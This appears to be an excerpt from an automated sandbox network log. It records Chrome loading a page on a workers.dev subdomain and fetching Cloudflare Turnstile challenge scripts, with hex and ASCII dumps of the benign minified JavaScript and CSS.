content="width=device-width,initial-scale=1" name=viewpor
2024-04-24 13:24:09 UTC	1369	IN	Data Raw: 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e Data Ascii: ont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-color:transparent;text-decoration:n
2024-04-24 13:24:09 UTC	1108	IN	Data Raw: 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 72 69 6e 67 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e Data Ascii: argin-bottom:1rem}}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}@media (prefers-color-scheme:dark){body{backgroun

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	104.17.2.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:09 UTC	604	OUT	GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:10 UTC	367	IN	HTTP/1.1 302 Found Date: Wed, 24 Apr 2024 13:24:10 GMT Content-Length: 0 Connection: close location: /turnstile/v0/b/471dc2adc340/api.js?onload=onloadTurnstileCallback cross-origin-resource-policy: cross-origin cache-control: max-age=300, public access-control-allow-origin: * Server: cloudflare CF-RAY: 8796697acc710a01-LAS alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	104.17.2.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:10 UTC	619	OUT	GET /turnstile/v0/b/471dc2adc340/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:10 UTC	340	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:10 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 42415 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=31536000 Cross-Origin-Resource-Policy: cross-origin Server: cloudflare CF-RAY: 8796697efc8a69e6-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:10 UTC	1029	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 62 74 28 65 2c 72 2c 74 2c 6f 2c 75 2c 73 2c 6d 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 73 5d 28 6d 29 2c 68 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 64 29 7b 74 28 64 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 72 28 68 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 68 29 2e 74 68 65 6e 28 6f 2c 75 29 7d 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 75 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function bt(e,r,t,o,u,s,m){try{var b=e[s](m),h=b.value}catch(d){t(d);return}b.done?r(h):Promise.resolve(h).then(o,u)}function Et(e){return function(){var r=this,t=arguments;return new Promise(function(o,u){var s=e.apply(r,t);funct
2024-04-24 13:24:10 UTC	1369	IN	Data Raw: 74 69 6f 6e 28 75 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 75 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6f 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 66 72 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 Data Ascii: tion(u){return Object.getOwnPropertyDescriptor(e,u).enumerable})),t.push.apply(t,o)}return t}function wt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):fr(Object(r)).forEach(funct
2024-04-24 13:24:10 UTC	1369	IN	Data Raw: 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 2c 72 29 7b 76 61 72 20 74 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 73 5b 30 5d 26 31 29 74 68 72 6f 77 20 73 5b 31 5d 3b 72 65 74 75 72 6e 20 73 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 75 2c 73 2c 6d 3b 72 65 74 75 72 6e 20 6d 3d 7b 6e 65 78 74 3a 62 28 30 29 2c 74 68 72 6f 77 3a 62 28 31 29 2c 72 65 74 75 72 6e 3a 62 28 32 29 7d 2c 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 6d 5b 53 79 6d 62 6f Data Ascii: &typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Re(e,r){var t={label:0,sent:function(){if(s[0]&1)throw s[1];return s[1]},trys:[],ops:[]},o,u,s,m;return m={next:b(0),throw:b(1),return:b(2)},typeof Symbol=="function"&&(m[Symbo
2024-04-24 13:24:10 UTC	1369	IN	Data Raw: 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 4f 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4f 65 3d 33 30 30 30 33 30 3b 66 75 6e 63 74 69 6f 6e 20 4e 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 76 61 72 20 44 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 3d 22 69 6e 76 69 73 69 62 6c 65 22 7d 29 28 44 7c 7c 28 44 3d 7b 7d 29 29 3b 76 Data Ascii: me parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ot=300020;var Oe=300030;function N(e,r){return e.indexOf(r)!==-1}var D;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(D\|\|(D={}));v
2024-04-24 13:24:10 UTC	1369	IN	Data Raw: 6e 67 22 26 26 70 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 76 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 4a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 76 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 Data Ascii: ng"&&pr.test(e)}var vr=/^[a-z0-9_\-=]{0,255}$/i;function Je(e){return e===void 0?!0:typeof e=="string"&&vr.test(e)}function Ze(e){return N(["normal","compact","invisible"],e)}function et(e){return N(["auto","manual","never"],e)}function tt(e){return N(["a
2024-04-24 13:24:10 UTC	1369	IN	Data Raw: 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 65 28 65 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 4e 65 28 29 3f 78 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 78 65 3d 66 75 6e 63 74 69 6f 6e 28 75 2c 73 2c 6d 29 7b 76 61 72 20 62 3d 5b 6e 75 6c 6c 5d 3b 62 2e 70 75 73 68 2e 61 70 70 6c 79 28 62 2c 73 29 3b 76 61 72 20 68 3d 46 75 6e 63 Data Ascii: (typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function xe(e,r,t){return Ne()?xe=Reflect.construct:xe=function(u,s,m){var b=[null];b.push.apply(b,s);var h=Func
2024-04-24 13:24:10 UTC	1369	IN	Data Raw: 6b 65 28 73 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 73 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 73 2e 63 6f 64 65 3d 75 2c 73 7d 72 65 74 75 72 6e 20 74 7d 28 4c 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 72 29 7b 76 61 72 20 74 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 59 74 28 74 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 Data Ascii: ke(s),"code",void 0),s.name="TurnstileError",s.code=u,s}return t}(Le(Error));function v(e,r){var t="[Cloudflare Turnstile] ".concat(e,".");throw new Yt(t,r)}function _(e){console.warn("[Cloudflare Turnstile] ".concat(e,"."))}function be(e){return e.starts
2024-04-24 13:24:10 UTC	1369	IN	Data Raw: 2e 63 6f 6e 63 61 74 28 53 29 29 3b 69 66 28 21 55 29 7b 64 2e 77 61 74 63 68 63 61 74 2e 6d 69 73 73 69 6e 67 57 69 64 67 65 74 57 61 72 6e 69 6e 67 7c 7c 28 5f 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 57 69 64 67 65 74 20 22 2e 63 6f 6e 63 61 74 28 53 2c 22 2c 20 63 6f 6e 73 69 64 65 72 20 75 73 69 6e 67 20 74 75 72 6e 73 74 69 6c 65 2e 72 65 6d 6f 76 65 28 29 20 74 6f 20 63 6c 65 61 6e 20 75 70 20 61 20 77 69 64 67 65 74 2e 22 29 29 2c 64 2e 77 61 74 63 68 63 61 74 2e 6d 69 73 73 69 6e 67 57 69 64 67 65 74 57 61 72 6e 69 6e 67 3d 21 30 29 3b 63 6f 6e 74 69 6e 75 65 7d 69 66 28 28 64 2e 69 73 45 78 65 63 75 74 69 6e 67 7c 7c 21 64 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 7c 7c 64 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 26 26 21 64 2e 69 73 53 74 61 Data Ascii: .concat(S));if(!U){d.watchcat.missingWidgetWarning\|\|(_("Cannot find Widget ".concat(S,", consider using turnstile.remove() to clean up a widget.")),d.watchcat.missingWidgetWarning=!0);continue}if((d.isExecuting\|\|!d.isInitialized\|\|d.isInitialized&&!d.isSta
2024-04-24 13:24:10 UTC	1369	IN	Data Raw: 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 66 75 6e 63 74 69 6f 6e 20 73 74 28 65 2c 72 29 7b 76 61 72 20 74 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 72 29 7b 76 61 Data Ascii: eyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params._debugSitekeyOverrides.clearance_level)),r.size!==0)return r.toString()}function st(e,r){var t="https://challenges.cloudflare.com";if(r){va
2024-04-24 13:24:10 UTC	1369	IN	Data Raw: 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 33 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3e 72 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 72 29 3a 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 4a 74 28 65 29 7b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 29 7b 69 66 28 21 74 7c 7c 74 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 42 4f 44 59 22 29 72 65 74 75 72 6e 20 6f 3b 66 6f 72 28 76 61 72 20 75 3d 31 2c 73 3d 74 2e 70 72 65 76 69 6f 75 73 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 3b 73 3b 29 73 2e 74 61 67 4e 61 6d 65 3d 3d 3d 74 2e 74 61 67 4e 61 6d 65 26 26 75 2b 2b 2c 73 3d 73 2e 70 72 65 76 69 6f 75 73 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e Data Ascii: ments.length>1&&arguments[1]!==void 0?arguments[1]:3;return e.length>r?e.substring(0,r):e};function Jt(e){var r=function(t,o){if(!t\|\|t.tagName==="BODY")return o;for(var u=1,s=t.previousElementSibling;s;)s.tagName===t.tagName&&u++,s=s.previousElementSiblin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	23.206.6.29	443

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:11 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-24 13:24:11 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (sac/2518) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=236377 Date: Wed, 24 Apr 2024 13:24:11 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	104.17.3.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:11 UTC	818	OUT	GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:12 UTC	1347	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() referrer-policy: same-origin accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA cross-origin-embedder-policy: require-corp critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self' cross-origin-opener-policy: same-origin cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cross-origin-resource-policy: cross-origin document-policy: js-profiling
2024-04-24 13:24:12 UTC	131	IN	Data Raw: 6f 72 69 67 69 6e 2d 61 67 65 6e 74 2d 63 6c 75 73 74 65 72 3a 20 3f 31 0d 0a 76 61 72 79 3a 20 61 63 63 65 70 74 2d 65 6e 63 6f 64 69 6e 67 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 37 39 36 36 39 38 38 30 66 65 61 30 61 63 64 2d 4c 41 53 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: origin-agent-cluster: ?1vary: accept-encodingServer: cloudflareCF-RAY: 879669880fea0acd-LASalt-svc: h3=":443"; ma=86400
2024-04-24 13:24:12 UTC	1369	IN	Data Raw: 31 61 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c Data Ascii: 1a99<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scal
2024-04-24 13:24:12 UTC	1369	IN	Data Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 72 6f 62 6f 74 6f 2c 20 6f 78 79 67 65 6e 2c 20 75 62 75 6e 74 75 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 Data Ascii: kground-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont, "Segoe UI", roboto, oxygen, ubuntu, "Helvetica Neue", arial, sans-ser
2024-04-24 13:24:12 UTC	1369	IN	Data Raw: 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20 Data Ascii: px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterlimit: 10;}#success-icon .p1
